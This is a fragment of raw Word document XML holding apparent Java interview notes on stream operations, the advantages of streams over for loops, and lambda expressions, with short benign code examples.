            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="069D83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not executed until a terminal operation is invoked)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63C2543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 (trigger the processing of the stream)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="026FEA8E" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38D58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72B22EE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other stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38BE953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result or produces side effects</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="7DFC2FB2" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A85EF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perations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F3658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filter(), distinct(), flatMap(), sorted()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02EA9F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 forEach(), reduce(), count(), min()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="4AC521A8" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4EBEB1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chained?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04BCE8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multiple intermediate operations can be chained</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E2BA0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erminal operations consume the stream and stop further operations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B422C8" w:rsidRPr="00CE4B95" w14:paraId="3A4A387D" w14:textId="77777777" w:rsidTr="00D844E8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07A8F8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Trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7854473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rigger the stream processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="543CC4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iggers the execution of the stream pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C65E7C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C79AB5C"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modify the stream, and the results are not realized until a terminal operation is called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AFE21B"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mediate operations help to transform and filter data, whereas terminal operations are used to obtain results or perform actions on the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36928EBF" w14:textId="683F8EBC" w:rsidR="00DB4F13" w:rsidRPr="00CE4B95"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13DE2E">
          <v:rect id="_x0000_i1694" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6D37F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38" w:name="_Toc197867452"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Advantages of Stream over for loop?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="238"/>
    </w:p>
    <w:p w14:paraId="1061DD63" w14:textId="28FE8F6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troduced in Java 8 offers several advantages over traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>for loops</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here are the key benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1576E13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cise and Readable Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAA5140"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riting functional-style code that is more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>conci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mpared to for loops.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFBB10E"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 xml:space="preserve"> of operations like filter(), map(), and collect() makes the code compact, reducing the need for verbose loops and conditionals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC457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674F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for loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6A20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555CAD9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F7CB1C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4DBE02E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number % 2 == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D82344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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571D6C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E1E87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06B48" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344096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 API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDF60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1083097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E0E17B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DB044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E42F8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code is more readable and declarative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A46AB9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Performance (Parallelism):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34329741"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ut-of-the-box using the parallelStream() method. This enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multi-core processors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to efficiently execute tasks in parallel without requiring complex thread management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E15DB3"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allel version of a stream divides the workload and processes parts of the collection simultaneously, potentially leading to significant performance improvements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D461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B27A3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equential Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F084F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4CE662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3D51B5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2A58ACB" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23CA413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allel Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2134F9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Parallel = numbers.parallelStream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084FEEA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7D82820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12C279A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greatly speed up processing when working with large collections, particularly if the operations inside the stream are computationally expensive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C2612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unctional Programming Style:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4116BCD6"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onstructs like map(), filter(), reduce(), and flatMap() which can lead to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>less error-prone</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>higher-level abstractions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for common tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20572E24"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ork with higher-order functions and lambda expressions for transforming data, making the code more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and easier to reason about.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B91F1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DB13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for loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478D3FF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new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DBA1D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ring s : list) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DCE7B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startsWith("A")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B2F2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s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21079B5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DE56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5BAD4C87" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="225DB7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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004914E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list.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB4072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s -&gt; s.startsWith("A"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8291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4B035E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 approach with streams makes it clear what is happening (filtering strings that start with "A").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4FD19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voiding Side Effects:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202883CB" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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help to minimize </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>side effects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> since operations like map() and filter() ar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This is different from traditional loops, where modifying variables or other mutable states inside the loop can lead to unexpected behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D54D8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B0F7E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ide-effect prone in a for loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C79CE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7E5106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09B2AEB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  // Modifying external state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E542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36EB2C" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09E8C9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o side effects in Stream API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42892CD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238B2A2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Pure function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDCC4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C5A152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operations are designed to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>side-effect free</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and don't mutate data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EAE26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Evaluation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFD0DDE" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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use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meaning that operations like map(), filter(), etc., are not applied until a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>terminal operation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., collect(), forEach()) is invoked. This can lead to optimizations, such as </w:t>
      </w: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xml:space="preserve"> the stream processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4609E6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f Lazy Evaluation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D00E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3CD219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This won't execute until terminal operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632C80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This also won't execute yet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D556B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10F979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lazy nature makes streams efficient because unnecessary operations are not performed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB2C1B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haining Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBED296" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method chaining</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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24651E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EC0797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900715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21090FC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AEA11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D67468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ining operations with streams is easier to read compared to managing the state and flow of the program manually in a for loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0A5C7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Error Handling (Optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8A7235" w14:textId="77777777" w:rsidR="00D844E8" w:rsidRPr="00CE4B95" w:rsidRDefault="00D844E8" w:rsidP="00B422C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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hen used with Optional, provide a more structured and elegant way to handle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rror scenarios</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, compared to the traditional use of null checks in a for loop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C5C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with Optional:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9126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Integer&gt; firstEven = numbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578F0E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26317A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dFirst();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5332811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Even.ifPresent(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538E18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 of Optional avoids the need for explicit null checks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3BCC5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etter Code Maintenance and Testability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1BB1C6"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eam operations are typically </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>small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cused</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, they tend to be easier to maintain and test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237FD64B"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perations are more focused on </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>what</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> you want to do rather than </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to do it, leading to easier refactoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4CBB2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nvenience for Working with Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB4EB69"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make it easy to work with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>complex collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, including filtering, mapping, reducing, etc., without writing loops explicitly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B7FAFA"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use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>collectors</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to gather results in custom ways (e.g., toMap(), groupingBy(), etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74242EF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29E9E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lt;Integer, List&lt;String&gt;&gt; grouped = list.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02003E9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groupingBy(String::length));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6D9BEA"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860AE">
          <v:rect id="_x0000_i1695" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E034C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Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9242B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p>
    <w:p w14:paraId="391566A7"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parallel processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050FF328"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4FEFFAE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ing side effects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4478702A"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 and optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B73E0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operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07807D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error handling with Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67636F8E"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testability and maintenance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBB7C84"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 for complex collection operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA4BD4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all,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re modern, efficient, and readable approach to handling collections, especially when compared to traditional for loops, making it easier to write functional-style code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0AB8A" w14:textId="4643707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696" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3F6891"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9" w:name="_Toc197867453"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the lambda expression in java 8?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="239"/>
    </w:p>
    <w:p w14:paraId="60F0FCD7" w14:textId="2740FB5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Lambda Expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA22D2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sic syntax of a lambda expression is as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAC3C1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8B0EC9"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of the lambda expression (like method parameters).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC2FE60"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gt;)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The arrow separates the parameters and the body of the lambda expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA57C0B"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The body of the lambda expression can be a single expression or a block of statements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7394A3A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5779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simple lambda expression that adds two integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED7B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int b) -&gt; a + b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CA110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s of a Lambda Expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FBD3D7"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The parameters of the lambda expression (optional type declaration, can be inferred by the compiler).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFAD604"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Token (-&gt;)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This separates the parameter list from the body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F13B69"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dy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
